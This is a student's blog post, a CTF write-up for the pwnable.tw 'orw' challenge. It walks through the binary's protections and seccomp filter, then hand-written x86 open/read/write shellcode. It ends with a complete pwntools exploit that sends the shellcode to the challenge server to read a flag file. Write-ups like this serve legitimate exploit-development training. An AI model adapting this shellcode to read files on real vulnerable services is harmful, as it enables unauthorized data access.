Hello i am arsalan. information system student, i blog about cyber security, ctf writeup , web development , and more about tech. born and raised in indonesia , currently living in indonesia

Posts   About

Open Read Write shellcoding

this article explains about ctf writeup.

orw writeup [pwnable.tw]

Challenge description

Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.
nc chall.pwnable.tw 10001

In this challenge we are given a binary , this is information about the binary

orw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 2.6.32, BuildID[sha1]=e60ecccd9d01c8217387e8b77e9261a1f36b5030, not stripped

And here are some of the protections that are active in this binary

Yea, the NX protection is disabled , so we can run our code inside the stack segment

Reverse engineering

Okay we’ve got some information we need , now it’s time to look at the decompilation let’s open it on ghidra and see the main function

As you can see , we can input data up to 200 bytes and our input will be stored at shellcode buffer , and after input the binary will jump to our buffer. and if you notice that , there is orw_seccomp() function , let’s use seccomp-tools to gathering more information

This binary allow us to use those syscall, so we can try to open the flag inside /home/orw/flag and read the value to buffer , and write the buffer. so it’s time to write some asm , before we write the exploit we have to see syscall code you can use this site here and search for sys_open , and this is what we got

Exploit

We have to set eax register to 0x5 and ebx to our file path and more so firstly to open the file, i make assembly code, like this

It will xor eax with eax so the value will set to 0 and we do the same instructions for ecx , and mov eax with 0x5 (sys_open syscall) so now eax value will have 0x5 (sys_open syscall) , and after that i push ecx and the string (as hex) to stack and mov ebx with esp

let’s do read

Actually we mov eax with 0x3 (sys_read syscall) and mov ecx with ebx ,ecx is our buffer and mov ebx with 0x3 because fd and mov dl with 0x30 for the size

and finally lets write it out

mov eax with 0x4 (sys_write syscall) and mov bl with 0x1 for fd

and don’t forget every time we write shellcode that call a syscall we have to use int 0x80 at the end of our shellcode , int 0x80 is the assembly language instruction that is used to invoke system calls in Linux on x86 (i.e., Intel-compatible) processors.

here is my full exploit code :

from pwn import *
def main():
	# sys_open()
	shellcode = asm('''
			xor 	eax, eax
			xor 	ecx, ecx
			mov 	eax, 0x5
			push 	ecx
			push 	0x67616c66       
			push 	0x2f77726f       
			push 	0x2f656d6f       
			push 	0x682f2f2f       
			mov 	ebx, esp
			int 	0x80
		''')
	# sys_read()
	shellcode += asm('''
			mov 	eax, 0x3
			mov 	ecx, ebx
			mov 	ebx, 0x3
			mov 	dl, 0x30
			int 	0x80
		''')
	# sys_write()
	shellcode += asm('''
			mov 	eax, 0x4
			mov 	bl, 0x1
			int 0x80
		''')
	#r = process("./orw")
	r = remote("chall.pwnable.tw",10001)
	r.sendline(shellcode)
	r.interactive()
if __name__ == '__main__':
	main()

And here is our flag :